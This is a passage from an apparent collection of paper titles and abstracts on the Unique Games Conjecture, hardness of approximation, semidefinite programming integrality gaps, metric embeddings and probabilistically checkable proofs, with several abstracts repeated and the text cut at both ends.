and Unique Games. --- paper_title: Towards computing the grothendieck constant paper_content: The Grothendieck constant KG is the smallest constant such that for every d ∈ N and every matrix A = (aij), ::: ::: [EQUATION] ::: ::: where B(d) is the unit ball in Rd. Despite several efforts [15, 23], the value of the constant KG remains unknown. The Grothendieck constant KG is precisely the integrality gap of a natural SDP relaxation for the KM, N-Quadratic Programming problem. The input to this problem is a matrix A = (aij) and the objective is to maximize the quadratic form Σij aijxiyj over xiyj ∈ [−1, 1]. ::: ::: In this work, we apply techniques from [22] to the KM, N-Quadratic Programming problem. Using some standard but non-trivial modifications, the reduction in [22] yields the following hardness result: Assuming the Unique Games Conjecture [9], it is NP-hard to approximate the KM, N-Quadratic Programming problem to any factor better than the Grothendieck constant KG. ::: ::: By adapting a "bootstrapping" argument used in a proof of Grothendieck inequality [5], we are able to perform a tighter analysis than [22]. Through this careful analysis, we obtain the following new results: ::: ::: • An approximation algorithm for KM, N-Quadratic Programming that is guaranteed to achieve an approximation ratio arbitrarily close to the Grothendieck constant KG (optimal approximation ratio assuming the Unique Games Conjecture). ::: ::: • We show that the Grothendieck constant KG can be computed within an error η, in time depending only on η. Specifically, for each η, we formulate an explicit finite linear program, whose optimum is η-close to the Grothendieck constant. ::: ::: We also exhibit a simple family of operators on the Gaussian Hilbert space that is guaranteed to contain tight examples for the Grothendieck inequality. --- paper_title: Sdp gaps and ugc hardness for multiway cut, 0-extension, and metric labeling paper_content: The connection between integrality gaps and computational hardness of discrete optimization problems is an intriguing question. In recent years, this connection has prominently figured in several tight UGC-based hardness results. We show in this paper a direct way of turning integrality gaps into hardness results for several fundamental classification problems. Specifically, we convert linear programming integrality gaps for the Multiway Cut, 0-Extension, and and Metric Labeling problems into UGC-based hardness results. Qualitatively, our result suggests that if the unique games conjecture is true then a linear relaxation of the latter problems studied in several papers (so-called earthmover linear program) yields the best possible approximation. Taking this a step further, we also obtain integrality gaps for a semi-definite programming relaxation matching the integrality gaps of the earthmover linear program. Prior to this work, there was an intriguing possibility of obtaining better approximation factors for labeling problems via semi-definite programming. --- paper_title: Optimal inapproximability results for MAX-CUT and other 2-variable CSPs? paper_content: In this paper, we give evidence suggesting that MAX-CUT is NP-hard to approximate to within a factor of /spl alpha//sub cw/+ /spl epsi/, for all /spl epsi/ > 0, where /spl alpha//sub cw/ denotes the approximation ratio achieved by the Goemans-Williamson algorithm (1995). /spl alpha//sub cw/ /spl ap/ .878567. This result is conditional, relying on two conjectures: a) the unique games conjecture of Khot; and, b) a very believable conjecture we call the majority is stablest conjecture. These results indicate that the geometric nature of the Goemans-Williamson algorithm might be intrinsic to the MAX-CUT problem. The same two conjectures also imply that it is NP-hard to (/spl beta/ + /spl epsi/)-approximate MAX-2SAT, where /spl beta/ /spl ap/ .943943 is the minimum of (2 + (2//spl pi/) /spl theta/)/(3 - cos(/spl theta/)) on (/spl pi//2, /spl pi/). Motivated by our proof techniques, we show that if the MAX-2CSP and MAX-2SAT problems are slightly restricted - in a way that seems to retain all their hardness -then they have (/spl alpha//sub GW/-/spl epsi/)- and (/spl beta/ - /spl epsi/)-approximation algorithms, respectively. Though we are unable to prove the majority is stablest conjecture, we give some partial results and indicate possible directions of attack. Our partial results are enough to imply that MAX-CUT is hard to (3/4 + 1/(2/spl pi/) + /spl epsi/)-approximate (/spl ap/ .909155), assuming only the unique games conjecture. We also discuss MAX-2CSP problems over non-Boolean domains and state some related results and conjectures. We show, for example, that the unique games conjecture implies that it is hard to approximate MAX-2LIN(q) to within any constant factor. --- paper_title: Approximation algorithms for unique games paper_content: We present a polynomial time algorithm based on semidefinite programming that, given a unique game of value 1 - O(1/logn), satisfies a constant fraction of constraints, where n is the number of variables. For sufficiently large alphabets, it improves an algorithm of Khot (STOC'02) that satisfies a constant fraction of constraints in unique games of value 1 -O(1/(k/sup 10/(log k)/sup 5/)), where k is the size of the alphabet. We also present a simpler algorithm for the special case of unique games with linear constraints. Finally, we present a simple approximation algorithm for 2-to-1 games. --- paper_title: On the power of unique 2-prover 1-round games paper_content: A 2-prover game is called unique if the answer of one prover uniquely determines the answer of the second prover and vice versa (we implicitly assume games to be one round games). The value of a 2-prover game is the maximum acceptance probability of the verifier over all the prover strategies. We make a conjecture regarding the power of unique 2-prover games, which we call the Unique Games Conjecture. --- paper_title: Approximating unique games paper_content: The UNIQUE GAMES problem is the following: we are given a graph G = (V, E), with each edge e = (u, v) having a weight w e and a permutation π uv on [k]. The objective is to find a labeling of each vertex u with a label f u ∈ [k] to minimize the weight of unsatisfied edges---where an edge (u, v) is satisfied if f v = π uv (f u ).The Unique Games Conjecture of Khot [8] essentially says that for each e > 0, there is a k such that it is NP-hard to distinguish instances of Unique games with (1-e) satisfiable edges from those with only e satisfiable edges. Several hardness results have recently been proved based on this assumption, including optimal ones for Max-Cut, Vertex-Cover and other problems, making it an important challenge to prove or refute the conjecture.In this paper, we give an O(log n)-approximation algorithm for the problem of minimizing the number of unsatisfied edges in any Unique game. Previous results of Khot [8] and Trevisan [12] imply that if the optimal solution has OPT = em unsatisfied edges, semidefinite relaxations of the problem could give labelings with min {k2e1/5, (e log n)1/2}m unsatisfied edges. In this paper we show how to round a LP relaxation to get an O(log n)-approximation to the problem; i.e., to find a labeling with only O(em log n) = O(OPT log n) unsatisfied edges. --- paper_title: How to Play Unique Games Using Embeddings paper_content: In this paper we present a new approximation algorithm for Unique Games. For a Unique Game with n vertices and k states (labels), if a (1 - \varepsilon) fraction of all constraints is satisfiable, the algorithm finds an assignment satisfying a 1 - O\left( {\varepsilon \sqrt {\log n\log k} } \right) fraction of all constraints. To this end, we introduce new embedding techniques for rounding semidefinite relaxations of problems with large domain size. --- paper_title: Approximation algorithms for unique games paper_content: We present a polynomial time algorithm based on semidefinite programming that, given a unique game of value 1 - O(1/logn), satisfies a constant fraction of constraints, where n is the number of variables. For sufficiently large alphabets, it improves an algorithm of Khot (STOC'02) that satisfies a constant fraction of constraints in unique games of value 1 -O(1/(k/sup 10/(log k)/sup 5/)), where k is the size of the alphabet. We also present a simpler algorithm for the special case of unique games with linear constraints. Finally, we present a simple approximation algorithm for 2-to-1 games. --- paper_title: Approximating unique games paper_content: The UNIQUE GAMES problem is the following: we are given a graph G = (V, E), with each edge e = (u, v) having a weight w e and a permutation π uv on [k]. The objective is to find a labeling of each vertex u with a label f u ∈ [k] to minimize the weight of unsatisfied edges---where an edge (u, v) is satisfied if f v = π uv (f u ).The Unique Games Conjecture of Khot [8] essentially says that for each e > 0, there is a k such that it is NP-hard to distinguish instances of Unique games with (1-e) satisfiable edges from those with only e satisfiable edges. Several hardness results have recently been proved based on this assumption, including optimal ones for Max-Cut, Vertex-Cover and other problems, making it an important challenge to prove or refute the conjecture.In this paper, we give an O(log n)-approximation algorithm for the problem of minimizing the number of unsatisfied edges in any Unique game. Previous results of Khot [8] and Trevisan [12] imply that if the optimal solution has OPT = em unsatisfied edges, semidefinite relaxations of the problem could give labelings with min {k2e1/5, (e log n)1/2}m unsatisfied edges. In this paper we show how to round a LP relaxation to get an O(log n)-approximation to the problem; i.e., to find a labeling with only O(em log n) = O(OPT log n) unsatisfied edges. --- paper_title: How to Play Unique Games Using Embeddings paper_content: In this paper we present a new approximation algorithm for Unique Games. For a Unique Game with n vertices and k states (labels), if a (1 - \varepsilon) fraction of all constraints is satisfiable, the algorithm finds an assignment satisfying a 1 - O\left( {\varepsilon \sqrt {\log n\log k} } \right) fraction of all constraints. To this end, we introduce new embedding techniques for rounding semidefinite relaxations of problems with large domain size. --- paper_title: On the power of unique 2-prover 1-round games paper_content: A 2-prover game is called unique if the answer of one prover uniquely determines the answer of the second prover and vice versa (we implicitly assume games to be one round games). The value of a 2-prover game is the maximum acceptance probability of the verifier over all the prover strategies. We make a conjecture regarding the power of unique 2-prover games, which we call the Unique Games Conjecture. --- paper_title: Approximation algorithms for unique games paper_content: We present a polynomial time algorithm based on semidefinite programming that, given a unique game of value 1 - O(1/logn), satisfies a constant fraction of constraints, where n is the number of variables. For sufficiently large alphabets, it improves an algorithm of Khot (STOC'02) that satisfies a constant fraction of constraints in unique games of value 1 -O(1/(k/sup 10/(log k)/sup 5/)), where k is the size of the alphabet. We also present a simpler algorithm for the special case of unique games with linear constraints. Finally, we present a simple approximation algorithm for 2-to-1 games. --- paper_title: Multicommodity max-flow min-cut theorems and their use in designing approximation algorithms paper_content: In this paper, we establish max-flow min-cut theorems for several important classes of multicommodity flow problems. In particular, we show that for any n-node multicommodity flow problem with uniform demands, the max-flow for the problem is within an O(log n) factor of the upper bound implied by the min-cut. The result (which is existentially optimal) establishes an important analogue of the famous 1-commodity max-flow min-cut theorem for problems with multiple commodities. The result also has substantial applications to the field of approximation algorithms. For example, we use the flow result to design the first polynomial-time (polylog n-times-optimal) approximation algorithms for well-known NP-hard optimization problems such as graph partitioning, min-cut linear arrangement, crossing number, VLSI layout, and minimum feedback arc set. Applications of the flow results to path routing problems, network reconfiguration, communication in distributed networks, scientific computing and rapidly mixing Markov chains are also described in the paper. Categories and Subject Descriptors: F.2.2 (Analysis of Algorithms and Problem Complexity): --- paper_title: How to Play Unique Games on Expanders paper_content: In this note we improve a recent result by Arora, Khot, Kolla, Steurer, Tulsiani, and Vishnoi on solving the Unique Games problem on expanders. Given a $(1-\varepsilon)$-satisfiable instance of Unique Games with the constraint graph $G$, our algorithm finds an assignment satisfying at least a $1- C \varepsilon/h_G$ fraction of all constraints if $\varepsilon<c \lambda_G$ where $h_G$ is the edge expansion of $G$, $\lambda_G$ is the second smallest eigenvalue of the Laplacian of $G$, and $C$ and $c$ are some absolute constants. --- paper_title: Spectral Algorithms for Unique Games paper_content: We present a new algorithm for Unique Games which is based on purely {\em spectral} techniques, in contrast to previous work in the area, which relies heavily on semidefinite programming (SDP). Given a highly satisfiable instance of Unique Games, our algorithm is able to recover a good assignment. The approximation guarantee depends only on the completeness of the game, and not on the alphabet size, while the running time depends on spectral properties of the {\em Label-Extended} graph associated with the instance of Unique Games. In particular, we show how our techniques imply a quasi-polynomial time algorithm that decides satisfiability of a game on the Khot-Vishnoi\cite{KV} integrality gap instance. Notably, when run on that instance, the standard SDP relaxation of Unique Games {\em fails}. As a special case, we also show how to re-derive a polynomial time algorithm for Unique Games on expander constraint graphs (similar to \cite{AKKTSV}) and a sub-exponential time algorithm for Unique Games on the Hypercube. --- paper_title: Graph expansion and the unique games conjecture paper_content: The edge expansion of a subset of vertices S ⊆ V in a graph G measures the fraction of edges that leave S. In a d-regular graph, the edge expansion/conductance Φ(S) of a subset S ⊆ V is defined as Φ(S) = (|E(S, V\S)|)/(d|S|). Approximating the conductance of small linear sized sets (size δ n) is a natural optimization question that is a variant of the well-studied Sparsest Cut problem. However, there are no known algorithms to even distinguish between almost complete edge expansion (Φ(S) = 1-ε), and close to 0 expansion. In this work, we investigate the connection between Graph Expansion and the Unique Games Conjecture. Specifically, we show the following: We show that a simple decision version of the problem of approximating small set expansion reduces to Unique Games. Thus if approximating edge expansion of small sets is hard, then Unique Games is hard. Alternatively, a refutation of the UGC will yield better algorithms to approximate edge expansion in graphs. This is the first non-trivial "reverse" reduction from a natural optimization problem to Unique Games. Under a slightly stronger UGC that assumes mild expansion of small sets, we show that it is UG-hard to approximate small set expansion. On instances with sufficiently good expansion of small sets, we show that Unique Games is easy by extending the techniques of [4]. --- paper_title: Graph expansion and the unique games conjecture paper_content: The edge expansion of a subset of vertices S ⊆ V in a graph G measures the fraction of edges that leave S. In a d-regular graph, the edge expansion/conductance Φ(S) of a subset S ⊆ V is defined as Φ(S) = (|E(S, V\S)|)/(d|S|). Approximating the conductance of small linear sized sets (size δ n) is a natural optimization question that is a variant of the well-studied Sparsest Cut problem. However, there are no known algorithms to even distinguish between almost complete edge expansion (Φ(S) = 1-ε), and close to 0 expansion. In this work, we investigate the connection between Graph Expansion and the Unique Games Conjecture. Specifically, we show the following: We show that a simple decision version of the problem of approximating small set expansion reduces to Unique Games. Thus if approximating edge expansion of small sets is hard, then Unique Games is hard. Alternatively, a refutation of the UGC will yield better algorithms to approximate edge expansion in graphs. This is the first non-trivial "reverse" reduction from a natural optimization problem to Unique Games. Under a slightly stronger UGC that assumes mild expansion of small sets, we show that it is UG-hard to approximate small set expansion. On instances with sufficiently good expansion of small sets, we show that Unique Games is easy by extending the techniques of [4]. --- paper_title: Inapproximability of NP-complete problems, discrete fourier analysis, and geometry paper_content: This article gives a survey of recent results that connect three areas in com- puter science and mathematics: (1) (Hardness of) computing approximate solutions to NP-complete problems. (2) Fourier analysis of boolean functions on boolean hypercube. (3) Certain problems in geometry, especially related to isoperimetry and embeddings between metric spaces. --- paper_title: Proof verification and the hardness of approximation problems paper_content: We show that every language in NP has a probablistic verifier that checks membership proofs for it using logarithmic number of random bits and by examining a constant number of bits in the proof. If a string is in the language, then there exists a proof such that the verifier accepts with probability 1 (i.e., for every choice of its random string). For strings not in the language, the verifier rejects every provided “proof” with probability at least 1/2. Our result builds upon and improves a recent result of Arora and Safra [1998] whose verifiers examine a nonconstant number of bits in the proof (though this number is a very slowly growing function of the input length). ::: As a consequence, we prove that no MAX SNP-hard problem has a polynomial time approximation scheme, unless NP = P. The class MAX SNP was defined by Papadimitriou and Yannakakis [1991] and hard problems for this class include vertex cover, maximum satisfiability, maximum cut, metric TSP, Steiner trees and shortest superstring. We also improve upon the clique hardness results of Feige et al. [1996] and Arora and Safra [1998] and show that there exists a positive ε such that approximating the maximum clique size in an N-vertex graph to within a factor of Nε is NP-hard. --- paper_title: On the power of unique 2-prover 1-round games paper_content: A 2-prover game is called unique if the answer of one prover uniquely determines the answer of the second prover and vice versa (we implicitly assume games to be one round games). The value of a 2-prover game is the maximum acceptance probability of the verifier over all the prover strategies. We make a conjecture regarding the power of unique 2-prover games, which we call the Unique Games Conjecture. --- paper_title: An Approximate Zero-One Law paper_content: We prove an approximate zero-one law, which holds for finite Bernoulli schemes. An application to percolation theory is given. --- paper_title: Finite metric spaces: combinatorics, geometry and algorithms paper_content: In the last several years a number of very interesting results were proved about finite metric spaces. Some of this work is motivated by practical considerations: Large data sets (coming e.g. from computational molecular biology, brain research or data mining) can be viewed as large metric spaces that should be analyzed (e.g. correctly clustered).On the other hand, these investigations connect to some classical areas of geometry - the asymptotic theory of finite-dimensional normed spaces and differential geometry. Finally, the metric theory of finite graphs has proved very useful in the study of graphs per se and the design of approximation algorithms for hard computational problems. In this talk I will try to explain some of the results and review some of the emerging new connections and the many fascinating open problems in this area. --- paper_title: Semidefinite Programming in Combinatorial Optimization paper_content: We discuss the use of semidefinite programming for combinatorial optimization problems. The main topics covered include (i) the Lovasz theta function and its applications to stable sets, perfect graphs, and coding theory, (ii) the automatic generation of strong valid inequalities, (iii) the maximum cut problem and related problems, and (iv) the embedding of finite metric spaces and its relationship to the sparsest cut problem. --- paper_title: On the power of unique 2-prover 1-round games paper_content: A 2-prover game is called unique if the answer of one prover uniquely determines the answer of the second prover and vice versa (we implicitly assume games to be one round games). The value of a 2-prover game is the maximum acceptance probability of the verifier over all the prover strategies. We make a conjecture regarding the power of unique 2-prover games, which we call the Unique Games Conjecture. --- paper_title: The Unique Games Conjecture, Integrality Gap for Cut Problems and Embeddability of Negative Type Metrics into ℓ1 paper_content: In this paper, we disprove a conjecture of Goemans and Linial; namely, that every negative type metric embeds into $\ell_1$ with constant distortion. We show that for an arbitrarily small constant $\delta> 0$, for all large enough $n$, there is an $n$-point negative type metric which requires distortion at least $(\log\log n)^{1/6-\delta}$ to embed into $\ell_1.$ ::: Surprisingly, our construction is inspired by the Unique Games Conjecture (UGC) of Khot, establishing a previously unsuspected connection between probabilistically checkable proof systems (PCPs) and the theory of metric embeddings. We first prove that the UGC implies a super-constant hardness result for the (non-uniform) Sparsest Cut problem. Though this hardness result relies on the UGC, we demonstrate, nevertheless, that the corresponding PCP reduction can be used to construct an "integrality gap instance" for Sparsest Cut. Towards this, we first construct an integrality gap instance for a natural SDP relaxation of Unique Games. Then we "simulate" the PCP reduction and "translate" the integrality gap instance of Unique Games to an integrality gap instance of Sparsest Cut. This enables us to prove a $(\log \log n)^{1/6-\delta}$ integrality gap for Sparsest Cut, which is known to be equivalent to the metric embedding lower bound. --- paper_title: Improved lower bounds for embeddings into L1 paper_content: We improve upon recent lower bounds on the minimum distortion of embedding certain finite metric spaces into $L_1$. In particular, we show that for every $n\ge1$, there is an $n$-point metric space of negative type that requires a distortion of $\Omega(\log\log n)$ for such an embedding, implying the same lower bound on the integrality gap of a well-known semidefinite programming relaxation for sparsest cut. This result builds upon and improves the recent lower bound of $(\log\log n)^{1/6-o(1)}$ due to Khot and Vishnoi [The unique games conjecture, integrality gap for cut problems and the embeddability of negative type metrics into $l_1$, in Proceedings of the 46th Annual IEEE Symposium on Foundations of Computer Science, IEEE, Piscataway, NJ, 2005, pp. 53-62]. We also show that embedding the edit distance metric on $\{0,1\}^n$ into $L_1$ requires a distortion of $\Omega(\log n)$. This result improves a very recent $(\log n)^{1/2-o(1)}$ lower bound by Khot and Naor [Nonembeddability theorems via Fourier analysis, in Proceedings of the 46th Annual IEEE Symposium on Foundations of Computer Science, IEEE, Piscataway, NJ, 2005, pp. 101-112]. --- paper_title: ON THE HARDNESS OF APPROXIMATING MULTICUT AND SPARSEST-CUT paper_content: We show that the Multicut, Sparsest-Cut, and Min-2CNF ? Deletion problems are NP-hard to approximate within every constant factor, assuming the Unique Games Conjecture of Khot (2002). A quantitatively stronger version of the conjecture implies an inapproximability factor of $$\Omega(\sqrt{\log \log n}).$$ --- paper_title: Integrality gaps for sparsest cut and minimum linear arrangement problems paper_content: Arora, Rao and Vazirani [2] showed that the standard semi-definite programming (SDP) relaxation of the Sparsest Cut problem with the triangle inequality constraints has an integrality gap of O(√log n). They conjectured that the gap is bounded from above by a constant. In this paper, we disprove this conjecture (referred to as the ARV-Conjecture) by constructing an Ω(log log n) integrality gap instance. Khot and Vishnoi [16] had earlier disproved the non-uniform version of the ARV-Conjecture.A simple "stretching" of the integrality gap instance for the Sparsest Cut problem serves as an Ω(log log n) integrality gap instance for the SDP relaxation of the Minimum Linear Arrangement problem. This SDP relaxation was considered in [6, 11], where it was shown that its integrality gap is bounded from above by O(√log n log log n). --- paper_title: The Unique Games Conjecture, Integrality Gap for Cut Problems and Embeddability of Negative Type Metrics into ℓ1 paper_content: In this paper, we disprove a conjecture of Goemans and Linial; namely, that every negative type metric embeds into $\ell_1$ with constant distortion. We show that for an arbitrarily small constant $\delta> 0$, for all large enough $n$, there is an $n$-point negative type metric which requires distortion at least $(\log\log n)^{1/6-\delta}$ to embed into $\ell_1.$ ::: Surprisingly, our construction is inspired by the Unique Games Conjecture (UGC) of Khot, establishing a previously unsuspected connection between probabilistically checkable proof systems (PCPs) and the theory of metric embeddings. We first prove that the UGC implies a super-constant hardness result for the (non-uniform) Sparsest Cut problem. Though this hardness result relies on the UGC, we demonstrate, nevertheless, that the corresponding PCP reduction can be used to construct an "integrality gap instance" for Sparsest Cut. Towards this, we first construct an integrality gap instance for a natural SDP relaxation of Unique Games. Then we "simulate" the PCP reduction and "translate" the integrality gap instance of Unique Games to an integrality gap instance of Sparsest Cut. This enables us to prove a $(\log \log n)^{1/6-\delta}$ integrality gap for Sparsest Cut, which is known to be equivalent to the metric embedding lower bound. --- paper_title: Limit theorems for polylinear forms paper_content: The limit theorems for polylinear forms are obtained. Conditions are found under which the distribution of the polylinear form of many random variables is essentially the same as if all the distributions of arguments were normal. --- paper_title: Geometric bounds on the Ornstein-Uhlenbeck velocity process paper_content: Let X: Ω→C(ℝ+;ℝ n ) be the Ornstein-Uhlenbeck velocity process in equilibrium and denote by τ A =τ A (X) the first hitting time of \(A \subseteq \mathbb{R}^n \). If A, B∈ℛn and ℙ(X(O)∈A=ℙ(X n (O)≦a), ℙ(X n (O)∈B=ℙ(X n (O)≧b)we prove that \(\mathbb{P}(\tau _A \underset{\raise0.3em\hbox{$\smash{\scriptscriptstyle-}$}}{ \leqslant } t)\underset{\raise0.3em\hbox{$\smash{\scriptscriptstyle-}$}}{ \geqslant } \mathbb{P}(\tau _{\{ \chi _n \underset{\raise0.3em\hbox{$\smash{\scriptscriptstyle-}$}}{ \leqslant } a\} } \underset{\raise0.3em\hbox{$\smash{\scriptscriptstyle-}$}}{ \leqslant } t)\) and \(\mathbb{E}\left( {\int\limits_0^{t \wedge \tau A} {1_{\text{B}} (X({\text{s}})d{\text{s}}} } \right)\underset{\raise0.3em\hbox{$\smash{\scriptscriptstyle-}$}}{ \leqslant } \mathbb{E}\left( {\int\limits_0^{t \wedge \tau _{\left\{ {x_n \underset{\raise0.3em\hbox{$\smash{\scriptscriptstyle-}$}}{ \leqslant } a} \right\}} } {1_{\left\{ {x_n \underset{\raise0.3em\hbox{$\smash{\scriptscriptstyle-}$}}{ \geqslant } b} \right\}} (X({\text{s))}}d{\text{s}}} } \right)\). Here X n denotes the n-th component of X. --- paper_title: Optimal inapproximability results for MAX-CUT and other 2-variable CSPs? paper_content: In this paper, we give evidence suggesting that MAX-CUT is NP-hard to approximate to within a factor of /spl alpha//sub cw/+ /spl epsi/, for all /spl epsi/ > 0, where /spl alpha//sub cw/ denotes the approximation ratio achieved by the Goemans-Williamson algorithm (1995). /spl alpha//sub cw/ /spl ap/ .878567. This result is conditional, relying on two conjectures: a) the unique games conjecture of Khot; and, b) a very believable conjecture we call the majority is stablest conjecture. These results indicate that the geometric nature of the Goemans-Williamson algorithm might be intrinsic to the MAX-CUT problem. The same two conjectures also imply that it is NP-hard to (/spl beta/ + /spl epsi/)-approximate MAX-2SAT, where /spl beta/ /spl ap/ .943943 is the minimum of (2 + (2//spl pi/) /spl theta/)/(3 - cos(/spl theta/)) on (/spl pi//2, /spl pi/). Motivated by our proof techniques, we show that if the MAX-2CSP and MAX-2SAT problems are slightly restricted - in a way that seems to retain all their hardness -then they have (/spl alpha//sub GW/-/spl epsi/)- and (/spl beta/ - /spl epsi/)-approximation algorithms, respectively. Though we are unable to prove the majority is stablest conjecture, we give some partial results and indicate possible directions of attack. Our partial results are enough to imply that MAX-CUT is hard to (3/4 + 1/(2/spl pi/) + /spl epsi/)-approximate (/spl ap/ .909155), assuming only the unique games conjecture. We also discuss MAX-2CSP problems over non-Boolean domains and state some related results and conjectures. We show, for example, that the unique games conjecture implies that it is hard to approximate MAX-2LIN(q) to within any constant factor. --- paper_title: Noise stability of functions with low influences: Invariance and optimality paper_content: In this paper we study functions with low influences on product probability spaces. The analysis of boolean functions with low influences has become a central problem in discrete Fourier analysis. It is motivated by fundamental questions arising from the construction of probabilistically checkable proofs in theoretical computer science and from problems in the theory of social choice in economics. ::: We prove an invariance principle for multilinear polynomials with low influences and bounded degree; it shows that under mild conditions the distribution of such polynomials is essentially invariant for all product spaces. Ours is one of the very few known non-linear invariance principles. It has the advantage that its proof is simple and that the error bounds are explicit. We also show that the assumption of bounded degree can be eliminated if the polynomials are slightly ``smoothed''; this extension is essential for our applications to ``noise stability''-type problems. ::: In particular, as applications of the invariance principle we prove two conjectures: the ``Majority Is Stablest'' conjecture from theoretical computer science, which was the original motivation for this work, and the ``It Ain't Over Till It's Over'' conjecture from social choice theory. --- paper_title: Optimal Long Code Test with One Free Bit paper_content: For arbitrarily small constants epsilon, delta ≫ 0$, we present a long code test with one free bit, completeness 1-epsilon and soundness delta. Using the test, we prove the following two inapproximability results:1. Assuming the Unique Games Conjecture of Khot, given an n-vertex graph that has two disjoint independent sets of size (1/2-epsilon)n each, it is NP-hard to find an independent set of size delta n.2. Assuming a (new) stronger version of the Unique Games Conjecture, the scheduling problem of minimizing weighted completion time with precedence constraints is inapproximable within factor 2-epsilon. --- paper_title: Noise stability of functions with low influences: Invariance and optimality paper_content: In this paper we study functions with low influences on product probability spaces. The analysis of boolean functions with low influences has become a central problem in discrete Fourier analysis. It is motivated by fundamental questions arising from the construction of probabilistically checkable proofs in theoretical computer science and from problems in the theory of social choice in economics. ::: We prove an invariance principle for multilinear polynomials with low influences and bounded degree; it shows that under mild conditions the distribution of such polynomials is essentially invariant for all product spaces. Ours is one of the very few known non-linear invariance principles. It has the advantage that its proof is simple and that the error bounds are explicit. We also show that the assumption of bounded degree can be eliminated if the polynomials are slightly ``smoothed''; this extension is essential for our applications to ``noise stability''-type problems. ::: In particular, as applications of the invariance principle we prove two conjectures: the ``Majority Is Stablest'' conjecture from theoretical computer science, which was the original motivation for this work, and the ``It Ain't Over Till It's Over'' conjecture from social choice theory. --- paper_title: Gowers uniformity, influence of variables, and PCPs paper_content: Gowers introduced, for d\geq 1, the notion of dimension-d uniformity U^d(f) of a function f: G -> \C, where G is a finite abelian group and \C are the complex numbers. Roughly speaking, if U^d(f) is small, then f has certain "pseudorandomness" properties. ::: We prove the following property of functions with large U^d(f). Write G=G_1 x >... x G_n as a product of groups. If a bounded balanced function f:G_1 x ... x G_n -> \C is such that U^{d} (f) > epsilon, then one of the coordinates of f has influence at least epsilon/2^{O(d)}. ::: The Gowers inner product of a collection of functions is a related notion of pseudorandomness. We prove that if a collection of bounded functions has large Gowers inner product, and at least one function in the collection is balanced, then there is a variable that has high influence for at least four of the functions in the collection. ::: Finally, we relate the acceptance probability of the "hypergraph long-code test" proposed by Samorodnitsky and Trevisan to the Gowers inner product of the functions being tested and we deduce applications to the construction of Probabilistically Checkable Proofs and to hardness of approximation. --- paper_title: Expander flows, geometric embeddings and graph partitioning paper_content: We give a O(slog n)-approximation algorithm for the sparsest cut, edge expansion, balanced separator, and graph conductance problems. This improves the O(log n)-approximation of Leighton and Rao (1988). We use a well-known semidefinite relaxation with triangle inequality constraints. Central to our analysis is a geometric theorem about projections of point sets in Rd, whose proof makes essential use of a phenomenon called measure concentration. We also describe an interesting and natural “approximate certificate” for a graph's expansion, which involves embedding an n-node expander in it with appropriate dilation and congestion. We call this an expander flow. --- paper_title: Sharp kernel clustering algorithms and their associated Grothendieck inequalities paper_content: In the kernel clustering problem we are given a (large) $n\times n$ symmetric positive semidefinite matrix $A=(a_{ij})$ with $\sum_{i=1}^n\sum_{j=1}^n a_{ij}=0$ and a (small) $k\times k$ symmetric positive semidefinite matrix $B=(b_{ij})$. The goal is to find a partition $\{S_1,...,S_k\}$ of $\{1,... n\}$ which maximizes $ \sum_{i=1}^k\sum_{j=1}^k (\sum_{(p,q)\in S_i\times S_j}a_{pq})b_{ij}$. We design a polynomial time approximation algorithm that achieves an approximation ratio of $\frac{R(B)^2}{C(B)}$, where $R(B)$ and $C(B)$ are geometric parameters that depend only on the matrix $B$, defined as follows: if $b_{ij} =$ is the Gram matrix representation of $B$ for some $v_1,...,v_k\in \R^k$ then $R(B)$ is the minimum radius of a Euclidean ball containing the points $\{v_1, ..., v_k\}$. The parameter $C(B)$ is defined as the maximum over all measurable partitions $\{A_1,...,A_k\}$ of $\R^{k-1}$ of the quantity $\sum_{i=1}^k\sum_{j=1}^k b_{ij}$, where for $i\in \{1,...,k\}$ the vector $z_i\in \R^{k-1}$ is the Gaussian moment of $A_i$, i.e., $z_i=\frac{1}{(2\pi)^{(k-1)/2}}\int_{A_i}xe^{-\|x\|_2^2/2}dx$. We also show that for every $\eps>0$, achieving an approximation guarantee of $(1-\e)\frac{R(B)^2}{C(B)}$ is Unique Games hard. --- paper_title: Optimal inapproximability results for MAX-CUT and other 2-variable CSPs? paper_content: In this paper, we give evidence suggesting that MAX-CUT is NP-hard to approximate to within a factor of /spl alpha//sub cw/+ /spl epsi/, for all /spl epsi/ > 0, where /spl alpha//sub cw/ denotes the approximation ratio achieved by the Goemans-Williamson algorithm (1995). /spl alpha//sub cw/ /spl ap/ .878567. This result is conditional, relying on two conjectures: a) the unique games conjecture of Khot; and, b) a very believable conjecture we call the majority is stablest conjecture. These results indicate that the geometric nature of the Goemans-Williamson algorithm might be intrinsic to the MAX-CUT problem. The same two conjectures also imply that it is NP-hard to (/spl beta/ + /spl epsi/)-approximate MAX-2SAT, where /spl beta/ /spl ap/ .943943 is the minimum of (2 + (2//spl pi/) /spl theta/)/(3 - cos(/spl theta/)) on (/spl pi//2, /spl pi/). Motivated by our proof techniques, we show that if the MAX-2CSP and MAX-2SAT problems are slightly restricted - in a way that seems to retain all their hardness -then they have (/spl alpha//sub GW/-/spl epsi/)- and (/spl beta/ - /spl epsi/)-approximation algorithms, respectively. Though we are unable to prove the majority is stablest conjecture, we give some partial results and indicate possible directions of attack. Our partial results are enough to imply that MAX-CUT is hard to (3/4 + 1/(2/spl pi/) + /spl epsi/)-approximate (/spl ap/ .909155), assuming only the unique games conjecture. We also discuss MAX-2CSP problems over non-Boolean domains and state some related results and conjectures. We show, for example, that the unique games conjecture implies that it is hard to approximate MAX-2LIN(q) to within any constant factor. --- paper_title: Parallel repetition: simplifications and the no-signaling case paper_content: Consider a game where a refereed chooses (x,y) according to a publiclyknown distribution PXY, sends x to Alice, and y to Bob. Withoutcommunicating with each other, Alice responds with a value "a" and Bobresponds with a value "b". Alice and Bob jointly win if a publiclyknown predicate Q(x,y,a,b) holds. Let such a game be given and assume that the maximum probabilitythat Alice and Bob can win is v --- paper_title: Probabilistic checking of proofs: a new characterization of NP paper_content: We give a new characterization of NP: the class NP contains exactly those languages <italic>L</italic> for which membership proofs (a proof that an input <italic>x</italic> is in <italic>L</italic>) can be verified probabilistically in polynomial time using <italic>logarithmic</italic> number of random bits and by reading <italic>sublogarithmic</italic> number of bits from the proof. ::: We discuss implications of this characterization; specifically, we show that approximating Clique and Independent Set, even in a very weak sense, is NP-hard. --- paper_title: Parallel Repetition in Projection Games and a Concentration Bound paper_content: A two-player game is played by cooperating players who are not allowed to communicate. A referee asks the players questions sampled from some known distribution and decides whether they win or not based on a known predicate of the questions and the players' answers. The parallel repetition of the game is the game in which the referee samples $n$ independent pairs of questions and sends the corresponding questions to the players simultaneously. If the players cannot win the original game with probability better than 